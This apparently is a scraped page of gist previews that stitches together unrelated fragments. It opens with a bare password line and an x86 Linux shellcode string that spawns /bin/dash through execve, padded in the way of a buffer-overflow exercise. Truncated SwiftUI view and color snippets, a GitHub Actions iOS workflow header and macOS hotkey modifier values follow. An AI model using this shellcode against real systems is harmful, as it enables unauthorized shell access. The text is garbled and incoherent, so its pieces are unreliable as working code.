Password: efeidiedae
Shellcode
“\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43”
| extension UIColor { | |
| static let flatDarkBackground = UIColor(red: 36, green: 36, blue: 36) | |
| static let flatDarkCardBackground = UIColor(red: 46, green: 46, blue: 46) | |
| convenience init(red: Int, green: Int, blue: Int, a: CGFloat = 1.0) { | |
| self.init(red: CGFloat(red) / 255.0, green: CGFloat(green) / 255.0, blue: CGFloat(blue) / 255.0, alpha: a) | |
| } | |
| } |
| struct StoreRow: View { | |
| var title: String | |
| var address: String | |
| var city: String | |
| var categories: [String] | |
| var kilometres: Double | |
| var body: some View { | |
| ZStack(alignment: .leading) { |
| struct CategoryPill: View { | |
| var categoryName: String | |
| var fontSize: CGFloat = 12.0 | |
| var body: some View { | |
| ZStack { | |
| Text(categoryName) | |
| .font(.system(size: fontSize, weight: .regular)) | |
| .lineLimit(2) |
| struct ContentView_Previews: PreviewProvider { | |
| static var previews: some View { | |
| Group { | |
| ContentView().environment(\.colorScheme, .light) | |
| ContentView().environment(\.colorScheme, .dark) | |
| } | |
| } | |
| } |
| name: iOS Test Workflow | |
| on: | |
| push: | |
| branches: | |
| - master | |
| pull_request: | |
| branches: | |
| - master | |
| jobs: | |
| build: |
| https://web.archive.org/web/20141114055851/http://krypted.com/mac-os-x/defaults-symbolichotkeys/ | |
| 131072: Shift | |
| 262144: Control | |
| 524288: Option | |
| 1048576: Command | |
| Add modifier values together in the 3rd parameter to combine them. | |
| { AppleSymbolicHotKeys = { |